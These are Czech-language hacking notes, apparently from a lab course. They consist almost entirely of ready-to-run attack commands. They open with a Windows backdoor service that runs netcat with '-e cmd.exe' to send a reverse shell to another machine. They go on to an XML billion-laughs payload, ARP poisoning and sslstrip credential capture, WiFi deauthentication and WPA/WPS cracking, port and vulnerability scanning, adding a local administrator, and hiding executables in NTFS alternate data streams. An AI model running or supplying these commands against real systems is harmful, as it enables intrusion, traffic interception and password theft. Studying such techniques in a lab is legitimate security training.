- Backdoor
Vytvoreni backdooru
na stroji student926-12 posloucham na stroji 926-11 si vytvorim service ktera se ke me pripoji:
nc.exe -L -p 8081 sc \\student926-11 create backdoor binpath= srvany.exe reg add student926-11HKLMSystemCurrentControlSetservicesbackdoorParameters /v Application /t REG_SZ /d "nc.exe student926-12 8081 -e cmd.exe" sc \\student926-11 start backdoor
- Pretizeni XML parseru
<!DOCTYPE lolz [
<!ENTITY lol "LoL">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>
&lol9;
</lolz>
- APR ve Windows = ARP Poisoning Routing = ca_setup_4.9.56 = Cain and Abel
- V Cainu:
- nastavit sitovku v menu Configure
- zapnout sniffer
- proskenovat sit pres tlacitko plus
- kliknout na zalozku APR a pluskem vybrat mezi koho si chci stoupnout
- zapneme radiaci
- V Cainu:
- APR v linuxu (kali linux):
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.1 192.168.1.7 -r
- SSL Strips v linuxu kali
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -f -w ulovky.txt
arpspoof -i eth0 -t 192.168.1.1 192.168.1.7 -r
- Vytvoreni rainbow table pomoci Winrtgen
- Wifi hacking
- wifi na linuxu - poslani odpojeni od site
aireplay-ng --deauth 1 -a E8:94:F6:F7:53:D4 -c E8:DE:27:12:DC:B9 wlan0mon --ignore-negative-one
- zachyceni komunikace do souboru
aircrack-ng swap-04.cap
- nastaveni sitovky na konkretni kanal
airodump-ng wlan0mon --channel 11 -a --bssid E8:94:F6:F7:53:D4 --write swap
- nastaveni sitovky do monitorovaciho modu
airmon-ng start wlan0
- kontrola nastaveni wifi adapteru
iwconfig
- vytvoreni slovniku na konkretniho uzivatele (cupp)
git clone https://github.com/Mebus/cupp.git cd cuppy python cupp.py -i
- rozlousknuti klice pomoci slovniku a zachycene komunikace
aircrack-ng -w cupp/roman.txt Cap-06.cap
- Vyhledavani WPS
wash -i wlan0mon
- Prolomeni na WPS ktere jsme si nasli o krok vys
reaver -i wlan0mon -b E8:94:F6:F7:53:D4 -v -d 10
-
prodlouzeni zkusebni doby u Win7
slmgr.vbs -rearm
napred si vymazeme arp tabulku. pak provedem oskenovani pingem celeho rozsahu, v arp tabulce mame udaje vsech aktivnich stroju v rozsahu
arp -d
FOR /L %i IN (1,1,254) DO @START /min cmd.exe /c PING -w 100 10.2.20.%i
arp -a
nmap
nastroj na skenovani
nmap -sn -n 10.0.0.1-254
oskenovani urcitych portu
FOR %i IN (25 53 80 110 135 139 445 8000 8080) DO START CMD /c NC 10.0.0.158 %i
vypis otevrenych spojeni = otevrenych portu
netstat -ano | findstr 10.0.0.158vypis otevrenych portu pres nmap
nmap -sS 10.0.0.158 -nvypis uplne vsech otevrenych portu pres nmap
nmap -sS 10.0.0.158 -n -p 1-65535
detekce OS
christmas scan
nmap -O 10.0.0.158
scanovani vulnerability nmapem
(skripty jsou v podadresari scripts)
c:\Program Files\Nmap\>nmap --script=*vuln* 10.0.0.158 -n
metasploit - umozni nam vyuzit zranitelnost zjistenou v predchozim krocepridai uzivatele do adminstratoru
net localgroup administrators pepa /add
ADS - alternativni datovy stream - ntfs - jak schovat info do souboru
echo pokus > pokus.txt
echo toto je tajny text > pokus.txt:tajny.txt
notepad pokus.txt:tajny.txt
type \WINDOWS\system32\calc.exe>pokus.txt:kalkulacka.exe
start .\pokus.txt:kalkulacka.exe --funguje jen na WinXProotkit
hxdef100